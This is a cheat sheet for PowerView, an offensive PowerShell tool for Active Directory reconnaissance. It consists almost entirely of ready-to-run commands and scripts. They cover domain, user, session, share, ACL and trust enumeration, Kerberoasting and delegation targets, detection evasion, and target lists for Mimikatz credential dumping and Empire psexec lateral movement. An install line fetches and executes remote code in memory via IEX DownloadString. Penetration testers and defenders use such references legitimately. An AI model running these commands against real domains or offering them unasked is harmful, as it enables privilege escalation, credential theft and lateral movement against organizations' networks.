PowerView Active Directory Enumeration Tool Cheat Sheet

Overview

PowerView is a PowerShell tool developed by Will Schroeder (@harmj0y) as part of the PowerSploit framework. It's designed for Active Directory enumeration and exploitation, providing extensive functionality for domain reconnaissance, privilege escalation path discovery, and attack vector identification in Windows environments.

⚠️ Warning: This tool is intended for authorized penetration testing and security assessments only. Ensure you have proper authorization before using in any environment.

Installation

PowerSploit Installation

# Download PowerSploit
Invoke-WebRequest -Uri "https://github.com/PowerShellMafia/PowerSploit/archive/master.zip" -OutFile "PowerSploit.zip"
Expand-Archive -Path "PowerSploit.zip" -DestinationPath "C:\Tools\"

# Import PowerView
Import-Module C:\Tools\PowerSploit-master\Recon\PowerView.ps1

# Alternative direct import
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1')

Standalone PowerView

# Download standalone PowerView
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" -OutFile "PowerView.ps1"

# Import PowerView
Import-Module .\PowerView.ps1

# Or execute directly
. .\PowerView.ps1

Dev Branch (Latest Features)

# Download dev branch (more features)
Invoke-WebRequest -Uri "https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/dev/Recon/PowerView.ps1" -OutFile "PowerView-dev.ps1"
Import-Module .\PowerView-dev.ps1

Basic Usage

Module Loading and Help

# Import PowerView
Import-Module PowerView.ps1

# Get all PowerView commands
Get-Command -Module PowerView

# Get help for specific function
Get-Help Get-DomainUser -Full

# List all PowerView functions
Get-Command *-Domain*
Get-Command *-Net*

Basic Domain Information

# Get current domain
Get-Domain

# Get domain controllers
Get-DomainController

# Get domain policy
Get-DomainPolicy

# Get domain trusts
Get-DomainTrust

# Get forest information
Get-Forest

Domain Enumeration

User Enumeration

# Get all domain users
Get-DomainUser

# Get specific user
Get-DomainUser -Identity administrator

# Get users with specific properties
Get-DomainUser -Properties samaccountname,description,pwdlastset

# Get users with SPN set (Kerberoastable)
Get-DomainUser -SPN

# Get users with pre-authentication disabled (AS-REP Roastable)
Get-DomainUser -PreauthNotRequired

# Get privileged users
Get-DomainUser -AdminCount

# Get users with passwords not required
Get-DomainUser -PasswordNotRequired

Group Enumeration

# Get all domain groups
Get-DomainGroup

# Get specific group
Get-DomainGroup -Identity "Domain Admins"

# Get group members
Get-DomainGroupMember -Identity "Domain Admins"

# Get groups for specific user
Get-DomainGroup -UserName administrator

# Get local groups on machines
Get-NetLocalGroup -ComputerName server01

# Get local group members
Get-NetLocalGroupMember -ComputerName server01 -GroupName Administrators

Computer Enumeration

# Get all domain computers
Get-DomainComputer

# Get computers with specific OS
Get-DomainComputer -OperatingSystem "*Server 2019*"

# Get computer properties
Get-DomainComputer -Properties dnshostname,operatingsystem,lastlogontimestamp

# Get computers with unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Get computers with constrained delegation
Get-DomainComputer -TrustedToAuth

# Get domain controllers
Get-DomainComputer -Properties dnshostname | Where-Object {$_.dnshostname -like "*dc*"}

Service Principal Name (SPN) Enumeration

# Get all SPNs
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname

# Get specific SPN types
Get-DomainUser -SPN | Where-Object {$_.serviceprincipalname -like "*SQL*"}

# Get SPNs for specific service
Get-DomainUser -SPN | Where-Object {$_.serviceprincipalname -like "*HTTP*"}

# Get unique SPN services
Get-DomainUser -SPN | ForEach-Object {$_.serviceprincipalname} | ForEach-Object {$_.split('/')[0]} | Sort-Object -Unique

Network Enumeration

Session Enumeration

# Get sessions on local machine
Get-NetSession

# Get sessions on remote machine
Get-NetSession -ComputerName server01

# Get sessions for all domain computers
Get-DomainComputer | ForEach-Object {Get-NetSession -ComputerName $_.dnshostname}

# Get logged on users
Get-NetLoggedon -ComputerName server01

# Get locally logged on users
Get-NetLoggedon -ComputerName server01 -LocalOnly

Share Enumeration

# Get shares on local machine
Get-NetShare

# Get shares on remote machine
Get-NetShare -ComputerName server01

# Get shares for all domain computers
Get-DomainComputer | ForEach-Object {Get-NetShare -ComputerName $_.dnshostname}

# Find interesting shares
Find-DomainShare

# Find readable shares
Find-DomainShare -CheckShareAccess

Process Enumeration

# Get processes on remote machine
Get-NetProcess -ComputerName server01

# Get processes for specific user
Get-NetProcess -ComputerName server01 | Where-Object {$_.owner -like "*administrator*"}

# Get processes across domain
Get-DomainComputer | ForEach-Object {Get-NetProcess -ComputerName $_.dnshostname}

Access Control and Permissions

ACL Enumeration

# Get ACLs for domain object
Get-DomainObjectAcl -Identity "Domain Admins"

# Get ACLs with specific rights
Get-DomainObjectAcl -Identity "Domain Admins" -ResolveGUIDs

# Find interesting ACLs
Find-InterestingDomainAcl

# Get ACLs for specific user
Get-DomainObjectAcl -Identity administrator -ResolveGUIDs

# Find objects with specific ACE
Get-DomainObjectAcl | Where-Object {$_.SecurityIdentifier -eq "S-1-5-21-..."}

Permission Analysis

# Find objects modifiable by current user
Find-InterestingDomainAcl -ResolveGUIDs | Where-Object {$_.IdentityReferenceName -like "*$env:USERNAME*"}

# Find GenericAll permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"}

# Find WriteDacl permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*WriteDacl*"}

# Find WriteOwner permissions
Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*WriteOwner*"}

Trust and Forest Enumeration

Domain Trust Analysis

# Get domain trusts
Get-DomainTrust

# Get forest trusts
Get-ForestTrust

# Map domain trusts
Get-DomainTrustMapping

# Get external trusts
Get-DomainTrust -API | Where-Object {$_.trust_type -eq "TRUST_TYPE_EXTERNAL"}

# Get bidirectional trusts
Get-DomainTrust | Where-Object {$_.TrustDirection -eq "Bidirectional"}

Cross-Domain Enumeration

# Enumerate users in trusted domain
Get-DomainUser -Domain trusted.domain.com

# Enumerate groups in trusted domain
Get-DomainGroup -Domain trusted.domain.com

# Get foreign group members
Get-DomainForeignGroupMember

# Get foreign users
Get-DomainForeignUser

Privilege Escalation Paths

Local Admin Access

# Find local admin access
Find-LocalAdminAccess

# Test local admin access on specific machine
Test-AdminAccess -ComputerName server01

# Find machines where current user has local admin
Get-DomainComputer | ForEach-Object {Test-AdminAccess -ComputerName $_.dnshostname}

# Find machines where domain users have local admin
Find-DomainLocalGroupMember -GroupName Administrators

Delegation Analysis

# Find unconstrained delegation
Get-DomainComputer -UnconstrainedDelegation

# Find constrained delegation
Get-DomainUser -TrustedToAuth
Get-DomainComputer -TrustedToAuth

# Find resource-based constrained delegation
Get-DomainComputer | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ObjectAceType -eq "ms-DS-Allowed-To-Act-On-Behalf-Of-Other-Identity"}

Kerberoasting Targets

# Find Kerberoastable users
Get-DomainUser -SPN

# Get detailed Kerberoasting targets
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname,pwdlastset,lastlogon

# Find high-value Kerberoasting targets
Get-DomainUser -SPN -AdminCount

# Find Kerberoastable users with old passwords
Get-DomainUser -SPN | Where-Object {$_.pwdlastset -lt (Get-Date).AddDays(-365)}

Attack Vector Discovery

BloodHound Data Collection

# Collect data for BloodHound (requires SharpHound)
# PowerView can supplement BloodHound data collection

# Get user sessions for BloodHound
Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetSession -ComputerName $computer
    foreach ($session in $sessions) {
        [PSCustomObject]@{
            Computer = $computer
            User = $session.sesi10_username
            Source = $session.sesi10_cname
        }
    }
}

Lateral Movement Paths

# Find computers with sessions from high-value users
$highValueUsers = Get-DomainGroupMember -Identity "Domain Admins" | Select-Object -ExpandProperty MemberName
Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    foreach ($session in $sessions) {
        if ($highValueUsers -contains $session.wkui1_username) {
            Write-Output "High-value user $($session.wkui1_username) logged on to $computer"
        }
    }
}

# Find shortest path to Domain Admins
Find-DomainUserLocation -UserGroupIdentity "Domain Admins"

Advanced Enumeration Techniques

LDAP Queries

# Custom LDAP queries
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=32))"

# Find users with specific attributes
Get-DomainUser -LDAPFilter "(&(objectCategory=person)(objectClass=user)(description=*))"

# Find computers with specific OS
Get-DomainComputer -LDAPFilter "(&(objectCategory=computer)(operatingSystem=*Server*))"

# Find groups with specific names
Get-DomainGroup -LDAPFilter "(&(objectCategory=group)(name=*admin*))"

GPO Enumeration

# Get all GPOs
Get-DomainGPO

# Get GPOs applied to specific OU
Get-DomainGPO -ComputerIdentity "OU=Servers,DC=domain,DC=com"

# Find interesting GPO settings
Get-DomainGPOLocalGroup

# Get GPO computer local group settings
Get-DomainGPOComputerLocalGroupMapping

# Find GPOs with specific settings
Get-DomainGPO | Where-Object {$_.displayname -like "*password*"}

OU and Container Analysis

# Get all OUs
Get-DomainOU

# Get objects in specific OU
Get-DomainComputer -SearchBase "OU=Servers,DC=domain,DC=com"

# Get OU ACLs
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs

# Find interesting OU permissions
Get-DomainOU | Get-DomainObjectAcl -ResolveGUIDs | Where-Object {$_.ActiveDirectoryRights -like "*GenericAll*"}

Stealth and Evasion

Avoiding Detection

# Use alternate credentials
$cred = Get-Credential
Get-DomainUser -Credential $cred

# Use specific domain controller
Get-DomainUser -Server dc02.domain.com

# Limit queries to avoid detection
Get-DomainUser -ResultPageSize 100

# Use LDAPS for encrypted queries
Get-DomainUser -Server dc01.domain.com -ServerTimeLimit 30

Minimal Footprint Enumeration

# Essential enumeration with minimal queries
$domain = Get-Domain
$domainAdmins = Get-DomainGroupMember -Identity "Domain Admins"
$spnUsers = Get-DomainUser -SPN
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Targeted enumeration
$targetUsers = @("administrator", "service_account", "backup_admin")
foreach ($user in $targetUsers) {
    Get-DomainUser -Identity $user
}

Automation and Reporting

Comprehensive Domain Assessment

# Comprehensive domain assessment script
param(
    [string]$OutputPath = "C:\Temp\DomainAssessment",
    [string]$Domain = $env:USERDOMAIN
)

# Create output directory
New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting comprehensive domain assessment for $Domain"

# Domain information
Write-Host "[+] Gathering domain information..."
Get-Domain | Out-File "$OutputPath\domain_info.txt"
Get-DomainController | Out-File "$OutputPath\domain_controllers.txt"
Get-DomainTrust | Out-File "$OutputPath\domain_trusts.txt"

# User enumeration
Write-Host "[+] Enumerating users..."
Get-DomainUser | Export-Csv "$OutputPath\domain_users.csv" -NoTypeInformation
Get-DomainUser -SPN | Export-Csv "$OutputPath\spn_users.csv" -NoTypeInformation
Get-DomainUser -AdminCount | Export-Csv "$OutputPath\privileged_users.csv" -NoTypeInformation

# Group enumeration
Write-Host "[+] Enumerating groups..."
Get-DomainGroup | Export-Csv "$OutputPath\domain_groups.csv" -NoTypeInformation
Get-DomainGroupMember -Identity "Domain Admins" | Export-Csv "$OutputPath\domain_admins.csv" -NoTypeInformation

# Computer enumeration
Write-Host "[+] Enumerating computers..."
Get-DomainComputer | Export-Csv "$OutputPath\domain_computers.csv" -NoTypeInformation
Get-DomainComputer -UnconstrainedDelegation | Export-Csv "$OutputPath\unconstrained_delegation.csv" -NoTypeInformation

# Share enumeration
Write-Host "[+] Enumerating shares..."
Find-DomainShare | Export-Csv "$OutputPath\domain_shares.csv" -NoTypeInformation

# ACL analysis
Write-Host "[+] Analyzing ACLs..."
Find-InterestingDomainAcl -ResolveGUIDs | Export-Csv "$OutputPath\interesting_acls.csv" -NoTypeInformation

Write-Host "[+] Assessment complete. Results saved to $OutputPath"

Privilege Escalation Path Discovery

# Privilege escalation path discovery script
param(
    [string]$TargetUser = "administrator",
    [string]$OutputPath = "C:\Temp\PrivEscPaths"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Discovering privilege escalation paths to $TargetUser"

# Find local admin access
Write-Host "[+] Finding local admin access..."
$localAdminAccess = Find-LocalAdminAccess
$localAdminAccess | Out-File "$OutputPath\local_admin_access.txt"

# Find user sessions
Write-Host "[+] Finding user sessions..."
$userSessions = Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    try {
        $sessions = Get-NetSession -ComputerName $computer -ErrorAction SilentlyContinue
        foreach ($session in $sessions) {
            [PSCustomObject]@{
                Computer = $computer
                User = $session.sesi10_username
                Source = $session.sesi10_cname
            }
        }
    } catch {}
}
$userSessions | Export-Csv "$OutputPath\user_sessions.csv" -NoTypeInformation

# Find Kerberoastable users
Write-Host "[+] Finding Kerberoastable users..."
$kerberoastable = Get-DomainUser -SPN
$kerberoastable | Export-Csv "$OutputPath\kerberoastable_users.csv" -NoTypeInformation

# Find delegation opportunities
Write-Host "[+] Finding delegation opportunities..."
$delegation = @()
$delegation += Get-DomainComputer -UnconstrainedDelegation | Select-Object @{Name="Type";Expression={"Unconstrained"}}, @{Name="Object";Expression={$_.dnshostname}}
$delegation += Get-DomainUser -TrustedToAuth | Select-Object @{Name="Type";Expression={"Constrained"}}, @{Name="Object";Expression={$_.samaccountname}}
$delegation | Export-Csv "$OutputPath\delegation_opportunities.csv" -NoTypeInformation

Write-Host "[+] Privilege escalation path discovery complete"

Network Mapping Script

# Network mapping script
param(
    [string]$OutputPath = "C:\Temp\NetworkMapping"
)

New-Item -ItemType Directory -Path $OutputPath -Force | Out-Null

Write-Host "[+] Starting network mapping"

# Get all computers
$computers = Get-DomainComputer -Properties dnshostname,operatingsystem

# Map shares
Write-Host "[+] Mapping shares..."
$allShares = @()
foreach ($computer in $computers) {
    try {
        $shares = Get-NetShare -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($share in $shares) {
            $allShares += [PSCustomObject]@{
                Computer = $computer.dnshostname
                ShareName = $share.shi1_netname
                ShareType = $share.shi1_type
                Remark = $share.shi1_remark
            }
        }
    } catch {}
}
$allShares | Export-Csv "$OutputPath\network_shares.csv" -NoTypeInformation

# Map sessions
Write-Host "[+] Mapping sessions..."
$allSessions = @()
foreach ($computer in $computers) {
    try {
        $sessions = Get-NetSession -ComputerName $computer.dnshostname -ErrorAction SilentlyContinue
        foreach ($session in $sessions) {
            $allSessions += [PSCustomObject]@{
                Computer = $computer.dnshostname
                User = $session.sesi10_username
                Source = $session.sesi10_cname
                Time = $session.sesi10_time
            }
        }
    } catch {}
}
$allSessions | Export-Csv "$OutputPath\network_sessions.csv" -NoTypeInformation

Write-Host "[+] Network mapping complete"

Integration with Other Tools

BloodHound Integration

# Supplement BloodHound data with PowerView
# Get additional session data
$sessions = Get-DomainComputer | ForEach-Object {
    Get-NetSession -ComputerName $_.dnshostname
}

# Get additional local group data
$localGroups = Get-DomainComputer | ForEach-Object {
    Get-NetLocalGroupMember -ComputerName $_.dnshostname -GroupName Administrators
}

# Export for BloodHound custom queries
$sessions | ConvertTo-Json | Out-File "bloodhound_sessions.json"
$localGroups | ConvertTo-Json | Out-File "bloodhound_localgroups.json"

Mimikatz Integration

# Find targets for Mimikatz
$highValueSessions = Get-DomainComputer | ForEach-Object {
    $computer = $_.dnshostname
    $sessions = Get-NetLoggedon -ComputerName $computer
    $sessions | Where-Object {$_.wkui1_username -in @("administrator", "domain admin", "enterprise admin")}
}

# Output targets for credential dumping
$highValueSessions | Select-Object Computer, User | Export-Csv "mimikatz_targets.csv" -NoTypeInformation

Empire Integration

# Generate target list for Empire
$targets = Find-LocalAdminAccess
$targets | ForEach-Object {
    Write-Output "usemodule lateral_movement/invoke_psexec"
    Write-Output "set ComputerName $_"
    Write-Output "execute"
}

Troubleshooting

Common Issues

# LDAP query failures
# Check domain connectivity
Test-NetConnection -ComputerName (Get-Domain).PdcRoleOwner -Port 389

# Permission issues
# Check current user context
whoami /groups

# Network connectivity
# Test WMI access
Get-WmiObject -Class Win32_OperatingSystem -ComputerName server01

# DNS resolution
# Test name resolution
Resolve-DnsName domain.com

Debug Mode

# Enable verbose output
$VerbosePreference = "Continue"

# Test specific functions
Get-DomainUser -Identity administrator -Verbose

# Check LDAP queries
Get-DomainUser -LDAPFilter "(samaccountname=administrator)" -Verbose

Best Practices

Operational Security

1. Use legitimate accounts: Avoid suspicious service accounts
2. Limit queries: Don't flood domain controllers with requests
3. Use specific targets: Target specific objects rather than broad enumeration
4. Clean up: Remove any created objects or modified ACLs
5. Monitor logs: Be aware of generated security events

Enumeration Strategy

# Phased approach
# Phase 1: Basic domain information
Get-Domain
Get-DomainController

# Phase 2: User and group enumeration
Get-DomainUser -Properties samaccountname,description
Get-DomainGroup -Properties samaccountname,description

# Phase 3: Privilege analysis
Get-DomainUser -AdminCount
Find-InterestingDomainAcl

# Phase 4: Attack vector identification
Get-DomainUser -SPN
Find-LocalAdminAccess

Resources

• PowerView GitHub Repository
• Harmj0y's Blog
• PowerSploit Documentation
• Active Directory Security
• SpecterOps Blog

---

This cheat sheet provides a comprehensive reference for using PowerView. Always ensure you have proper authorization before conducting Active Directory security assessments.